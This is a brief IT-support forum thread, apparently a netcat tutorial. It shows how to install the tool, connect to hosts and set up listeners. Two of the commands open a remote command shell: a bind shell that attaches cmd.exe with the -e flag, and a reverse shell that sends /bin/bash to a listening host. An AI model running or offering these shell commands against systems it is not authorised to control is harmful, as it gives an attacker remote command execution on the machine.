PC & IT SUPPORT MADE EASY FORUM
Would you like to react to this message? Create an account in a few clicks or log in to continue.

using netcat

Go down

using netcat Empty using netcat

Post by jamied_uk 31st May 2012, 15:08




More on youtube.com/watch?v=QBbzxuOinz0&feature=related


now for netcat install.

Code:
sudo apt-get install -y netcat top

Code:
nc -v ip

Code:
-vn

or


Code:
nc -vn ip 1234


bind to cmd


Code:
nc -lvt ip 1234 -e cmd.exe


nc -vn ip 1234





send cmd shell to a listener

receive
Code:
nc -lvp 1234


sending

Code:
nc -vn ip port -e /bin/bash


now on receiving side type ls

type

Code:
top

or


Code:
ls


Last edited by jamied_uk on 26th May 2018, 15:13; edited 1 time in total
jamied_uk
jamied_uk
Admin

Posts : 2951
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

using netcat Empty Re: using netcat

Post by jamied_uk 26th May 2018, 15:06

2018 Edition


Box Update Link (For The Code).

app.box.com/s/8tmrt1a6pz8ghvojac1uxjyj2t73rhvf
jamied_uk
jamied_uk
Admin

Posts : 2951
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum